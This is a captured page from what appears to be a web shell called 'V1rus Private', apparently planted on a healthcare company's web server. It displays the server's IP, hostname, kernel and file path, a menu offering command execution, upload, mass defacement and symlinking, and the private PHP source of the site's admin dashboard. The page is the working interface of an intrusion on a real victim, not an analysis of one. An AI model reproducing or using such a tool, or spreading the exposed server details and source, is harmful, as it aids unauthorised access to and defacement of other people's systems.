V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
public_html
/
dashboard
/
Viewing: dashboard.php
<?php include "include/connection.php"; include "include/top-meta.php"; include "include/header.php"; include "include/left.php"; ?> <!-- Content Wrapper. Contains page content --> <!-- Main content --> <section class="content"> <!-- Main row --> <div class="row"> <!-- Left col --> <section class="col-lg-6 connectedSortable"> <!-- Custom tabs (Charts with tabs)--> <div class="box box-info"> <div class="box-header with-border"> <h3 class="box-title">Static Pages</h3> <div class="box-tools pull-right"> <button type="button" class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i> </button> <button type="button" class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button> </div> </div> <!-- /.box-header --> <div class="box-body"> <div class="table-responsive"> <!--<table class="table no-margin"> <thead> <tr> <th>Page Title</th> <th>Slug</th> </tr> </thead> <tbody> <?php if (is_array($arr) && count($arr) > 0) { foreach ($arr as $row) { ?> <tr> <td > <?php echo $row["title"];?></td > <td ><?php echo $row["slug"];?></td > </tr> <?php } } ?> </tbody> </table>--> </div> <!-- /.table-responsive --> </div> <!-- /.box-body --> </div> <!-- /.nav-tabs-custom --> </section> <!-- /.Left col --> <!-- right col (We are only adding the ID to make the widgets sortable)--> <section class="col-lg-6 connectedSortable"> <div class="box box-info"> <div class="box-header with-border"> <h3 class="box-title">Products</h3> <div class="box-tools pull-right"> <button type="button" class="btn btn-box-tool" data-widget="collapse"><i class="fa fa-minus"></i> </button> <button type="button" class="btn btn-box-tool" data-widget="remove"><i class="fa fa-times"></i></button> </div> </div> <!-- /.box-header --> <div class="box-body"> <div class="table-responsive"> <!--<table class="table no-margin"> <thead> <tr> <th>#ID</th> <th>Title</th> <th>Category ID</th> </tr> </thead> <tbody> <?php if (is_array($arr1) && count($arr1) > 0) { foreach ($arr1 as $row1) { ?> <tr> <td><a href=""><?php echo $row1["id"];?></a></td> <td><?php echo ucfirst($row1['product_title']); ?></td> <td><?php echo $row1['cat_id']; ?></td> </tr> <?php } } ?> </tbody> </table>--> </div> <!-- /.table-responsive --> </div> <!-- /.box-body --> </div> </section> <!-- right col --> </div> <!-- /.row (main row) --> </section> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include "include/footer.php"; include "include/footer-meta.php"; ?>
Coded With 💗 by
HanzOFC